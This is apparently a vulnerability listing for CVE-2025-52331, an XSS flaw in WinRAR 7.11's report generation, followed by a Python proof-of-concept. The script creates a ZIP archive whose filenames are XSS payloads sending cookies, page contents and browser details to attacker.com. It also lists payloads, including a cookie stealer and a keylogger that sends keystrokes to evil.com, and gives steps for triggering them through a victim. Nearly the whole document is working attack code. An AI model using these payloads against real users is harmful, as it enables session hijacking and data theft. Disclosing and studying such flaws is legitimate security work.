CVE-2025-52331 WinRAR 7.11生成报告功能跨站脚本漏洞

# CVE-2025-52331 PoC - WinRAR 7.11 XSS in Generate Report # This PoC demonstrates the XSS vulnerability in WinRAR's report generation import zipfile import os def create_malicious_rar(): """ Create a malicious archive file that contains XSS payloads in filenames """ malicious_filenames = [ '<img src=x onerror=fetch(`https://attacker.com/?c=${document.cookie}`)>.txt', '<script>new Image().src=`https://attacker.com/?u=${window.location.href}&n=${navigator.userAgent}`</script>', '<svg/onload=fetch(`https://attacker.com/?i=${document.domain}`)>', '<iframe src="javascript:fetch(`https://attacker.com/?data=${btoa(document.body.innerHTML)}`)">' ] # Create a ZIP file (WinRAR can open ZIP files) with zipfile.ZipFile('malicious_archive.zip', 'w') as zipf: for i, filename in enumerate(malicious_filenames): # Add a file with the malicious filename content = f'Normal file content {i}' zipf.writestr(filename, content) print('[+] Created malicious_archive.zip with XSS payloads in filenames') print('[+] When user generates report and opens HTML, XSS will execute') def generate_xss_payload(): """ Generate various XSS payloads for testing """ payloads = { 'cookie_stealer': '<img src=x onerror="fetch(`https://evil.com/?c=${document.cookie}`)">', 'info_disclosure': '<script>fetch(`https://evil.com/?u=${navigator.userAgent}&h=${window.location.href}`)</script>', 'dom_manipulation': '<svg/onload="document.body.innerHTML=`<h1>Hacked</h1>`">', 'keylogger': '<script>document.onkeypress=function(e){fetch(`https://evil.com/k?${e.key}`)}</script>' } return payloads if __name__ == '__main__': print('CVE-2025-52331 WinRAR XSS PoC') print('=' * 50) create_malicious_rar() print('\n[!] User must:') print(' 1. Open the malicious archive with WinRAR 7.11') print(' 2. Use "Generate Report" feature') print(' 3. Open the generated HTML report') print(' 4. XSS payload will execute in browser context')